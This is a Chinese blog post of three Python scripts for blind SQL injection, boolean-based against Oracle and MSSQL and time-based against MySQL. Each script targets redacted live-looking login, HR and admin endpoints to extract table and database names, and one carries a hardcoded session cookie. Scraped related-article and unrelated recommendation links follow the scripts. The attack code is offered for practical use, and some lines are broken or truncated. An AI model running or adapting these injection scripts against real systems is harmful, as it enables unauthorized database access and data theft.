【实战】SQL注入小脚本
1、ORACLE布尔型盲注
import urllib
import urllib2
import requests
payloads = '_ABCDEFGHIJKLMNOPQRSTUVWXYZ'
header = { 'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)' }
values={}
print 'Start to retrive database:'
database= ''
#需要先手工判断当前表名长度
for i in range(1, 21):
for payload in payloads:
try:
values['
values['
values['phoneNumber']="' or (select substr(table_name,%s,1) from user_tables where rownum=1)='%s' and '1'='1" % (str(i),str(payload))
data = urllib.urlencode(values)
url = "https://xxx.xxx.xxx.xxx/api/xxx/reg/action/xxx/appUserLogin.json"
req = urllib2.Request(url,data=data,headers=header)
resp = urllib2.urlopen(req).read()
#匹配关键字输出正确的数据库名
if "status" in resp:
database += payload
print 'the database is:'+ database
break
else:
print 'dumping database...'
except Exception,e:
print e
2、MSSQL布尔型盲注
import urllib
import urllib2
import requests
payloads = 'abcdefghijklmnopqrstuvwxyz_'
header = {'User-Agent':'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)','Cookie':'ASP.NET_SessionId=4vmyjpbw03vk2aq0q5mlbemy'}
values={}
print 'Start to retrive database:'
user= ''
length=[]
databases=[]
db=''
#注出数据库
def dump_db(i,j):
global db
for n in range(1,j+1):
for payload in payloads:
try:
values['txtMemberName']="xxx%' and (select count(*) from master.dbo.sysdatabases where dbid={0} and substring(name,{1},1)='{2}')=1--".format(i,n,payload)
data = urllib.urlencode(values)
url = "http://xxx.xxx.xxx/HR/xxx/xxx.aspx"
req = urllib2.Request(url,data=data,headers=header)
resp = urllib2.urlopen(req).read()
if "Robert" in resp:
db += payload
print db
if n == j:
databases.append(db)
db=''
break
else:
print 'dumping database...'
except Exception,e:
print e
#遍历判断数据库的长度,需要手工判断数据库个数
for i in range(1,19):
for j in range(1,16):
try:
values['txtMemberName']="xxx%' and (select count(*) from master.dbo.sysdatabases where dbid={0} and len(name)={1})=1--".format(i,j)
data = urllib.urlencode(values)
url = "http://xxx.xxx.xxx/HR/xxx/xxx.aspx"
req = urllib2.Request(url,data=data,headers=header)
#print req
resp = urllib2.urlopen(req).read()
#print resp
if "Robert" in resp:
print 'the length of DB_%s is %s' % (str(i),str(j))
dump_db(i,j)
#print 'the DB is: %s' % str(db)
length.append(j)
break
else:
print 'dumping length...'
except Exception,e:
print e
print '-------------------------'
for ddd in range(0,17):
print databases[ddd]
print '-------------------------'
3、MYSQL基于时间的盲注
import urllib
import urllib2
import time
payloads = 'abcdefghijklmn@_.opqrstuvwxyz0123456789'
header = {'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'}
values={}
print 'Start to retrive database:'
database= ''
for i in range(1, 6):
for payload in payloads:
try:
values['pageSize']=10
values['pageNum']=1
values['isAsc']='asc'
values['orderByColumn']="(select*from(select(if(ascii(mid(database(),%s,1))=%s,sleep(2),1)))a)" % (i,ord(payload))
data = urllib.urlencode(values)
url = "https://xxx.xxx.xxx/system/user/list"
t_s = time.time()
request = urllib2.Request(url,data,headers=header)
response = urllib2.urlopen(request,timeout=5)
t_e = time.time()
if((t_e-t_s)>2):
database += payload
print 'the database() is:\t' + database
time.sleep(2.0)
break
else:
print 'dumping......'
except:
pass
【实战】SQL注入小脚本的更多相关文章
- zabbix(sql注入判断脚本)
zabbix(sql注入判断脚本) #-*-coding:utf-8-*- # code by anyun.org import urllib import re def getHtml(url): ...
- Zabbix sql注入漏洞脚本执行反弹shell
exp检测是否存在SQL注入漏洞root@ubuntu:~# python zabbix.py http://ip:9090/+------------------------------------ ...
- 实战SQL注入
SQL注入是啥就不解释了.下面演示一个SQL注入的例子 SQL注入点可以自己尝试或用SQL注入漏洞扫描工具去寻找,这里用大名鼎鼎的sqlmap演示一个现成的案例. 1.漏洞试探 root@kali:~ ...
- python打造一个分析网站SQL注入的脚本
前言: 昨天晚上其实就已经写完代码.只不过向FB投稿了,打算延迟一晚上在写博客 所有才到今天早上写.好了,接下来进入正题. 思路: 1.从网站源码中爬取那些类适于:http://xxx.com/xx. ...
- python SQL注入测试脚本(更新中)
import requests import json import warnings warnings.filterwarnings("ignore") url = 'https ...
- sql注入小姿势
利用/*!union*/可以绕过对union的过滤
- SQL注入不简单?那是你没有懂它的原理~
我们真的了解SQL注入吗? 不管用什么语言编写的Web应用,它们都用一个共同点,具有交互性并且多数是数据库驱动.在网络中,数据库驱动的Web应用随处可见,由此而存在的SQL注入是影响企业运营且最具破坏 ...
- Web安全学习笔记 SQL注入下
Web安全学习笔记 SQL注入下 繁枝插云欣 --ICML8 SQL注入小技巧 CheatSheet 预编译 参考文章 一点心得 一.SQL注入小技巧 1. 宽字节注入 一般程序员用gbk编码做开发的 ...
- MySQL SQL 注入
如果您通过网页获取用户输入的数据并将其插入一个MySQL数据库,那么就有可能发生SQL注入安全的问题. 本博文将为大家介绍如何防止SQL注入,并通过脚本来过滤SQL中注入的字符. 所谓SQL注入,就是 ...
随机推荐
- oracle根据sqlID查找相对应的sql语句
转: 根据sqlID查找相对应的sql语句 2019-07-25 14:47:20 猛豪 阅读数 567更多 分类专栏: 数据库 版权声明:本文为博主原创文章,遵循CC 4.0 BY-SA版权协议 ...
- pip 安装指定版本
pip在安装包的时候可以不需要从网上下载,以windows的scipy为例 pip install scipy==0.15.1 以上表示安装0.15.1版本的scipy,这里用”==”接版本,如果权限 ...
- PHP IE9 AJAX success 返回 undefined 问题解决
jquery的AJAX返回结果为undefined,并且有“由于出现错误c00ce56e”的错误提示.这个问题是由于IE9不能解析其他编码而产生的.解决这个问题之需要按照W3C规范,声明一下编码为ut ...
- 宣化上人: 大佛顶首楞严经四种清净明诲浅释(8-9)(转自学佛网:http://www.xuefo.net/nr/article23/230825.html)
大佛顶首楞严经四种清净明诲浅释(8) 唐天竺·沙门般剌密帝译 宣化上人主讲 一九八三年四月十七日晚讲于万佛圣城 各自谓己得上人法.詃惑无识.恐令失心.所过之处.其家耗散. 各自谓己:每一个都是自己称赞 ...
- mybatis 级联
级联是一个数据库实体的概念.一对多的级联,一对多的级联,在MyBatis中还有一种被称为鉴别器的级联,它是一种可以选择具体实现类的级联. 级联不是必须的,级联的好处是获取关联数据十分便捷,但是级联过多 ...
- Python - Django - request 对象
request.method: 获取请求的方法,例如 GET.POST 等 views.py: from django.shortcuts import render, HttpResponse # ...
- 【Leetcode_easy】1128. Number of Equivalent Domino Pairs
problem 1128. Number of Equivalent Domino Pairs solution1: 不明白为什么每个元素都要加上count: class Solution { pub ...
- 【JQuery插件】扑克正反面翻牌效果
里面有两个demo,支持X横向和Y纵向翻转两个效果. 对元素的布局有一定的讲究,需要分析一下demo的css. 默认翻转速度为80,不要大于100ms. <!DOCTYPE> <ht ...
- Linux18.04换源等等等配置
root用户 sudo passwd root 安装Tools 文件→其他位置→Vmware Tools→打开终端. 管理员权限→copy→tar -zxvf 文件名解压→打开vmware-tools ...
- docker安装MongoDB创建用户,并用工具Robo连接简单CRUD
搜索mongo docker search mongo 拉取mongo[这里默认为latest] docker pull mongo 查看本地镜像 启动容器[就是安装,-v后面的参数表示把数据文件挂载 ...